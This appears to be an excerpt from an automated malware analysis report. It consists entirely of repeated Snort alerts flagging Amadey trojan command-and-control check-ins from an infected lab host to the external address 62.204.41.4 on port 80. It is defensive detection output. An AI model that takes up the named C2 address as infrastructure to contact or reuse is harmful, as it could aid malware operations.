                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49741 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49742 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49743 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49745 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49746 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49747 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49748 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49749 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49750 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49751 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49752 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49753 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49754 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49755 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49756 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49757 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49758 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49759 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49760 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49761 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49762 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49763 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49764 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49765 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49766 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49767 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49768 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49769 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49770 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49771 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49772 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49773 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49774 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49775 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49776 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49777 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49778 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49779 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49780 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49781 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49782 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49783 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49784 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49785 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49786 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49787 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49788 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49789 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49790 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49791 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49792 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49793 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49794 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49795 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49796 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49797 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49798 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49799 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49800 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49801 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49802 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49803 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49804 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49805 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49806 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49807 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49808 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49809 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49810 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49811 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49812 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49813 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49814 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49815 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49816 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49817 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49818 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49819 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49820 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49821 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49822 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49823 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49824 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49825 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49826 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49827 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49828 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49829 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49830 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49831 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49832 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49833 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49834 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49835 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49836 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49837 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49838 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49839 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49840 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49841 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49842 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49843 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49844 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49845 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49846 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49847 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49848 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49849 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49850 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49851 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49852 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49853 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49854 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49855 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49856 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49857 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49858 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49859 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49860 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49861 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49862 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49863 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49864 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49865 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49866 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49867 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49868 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49869 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49870 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49871 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49872 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49873 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49874 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49875 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49876 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49877 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49878 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49879 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49880 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49881 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49882 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49883 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49884 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49885 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49886 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49887 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49888 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49889 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49890 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49891 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49892 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49893 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49894 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49895 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49896 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49897 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49898 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49899 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49900 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49901 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49902 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49903 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49904 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49905 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49906 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49907 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49908 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49909 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49910 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49911 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49912 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49913 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49914 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49915 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49916 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49917 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49918 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49919 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49920 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49921 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49922 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49923 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49924 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49925 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49926 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49927 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49928 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49929 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49930 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49931 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49932 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49933 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49934 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49935 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49936 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49937 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49938 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49939 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49940 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49941 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49942 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49943 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49944 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49945 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49946 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49947 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49948 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49949 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49950 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49951 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49952 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49953 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49954 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49955 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49956 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49957 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49958 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49959 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49960 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49961 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49962 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49963 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49964 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49965 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49966 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49967 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49968 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49969 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49970 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49971 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49972 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49973 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49974 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49975 -> 62.204.41.4:80
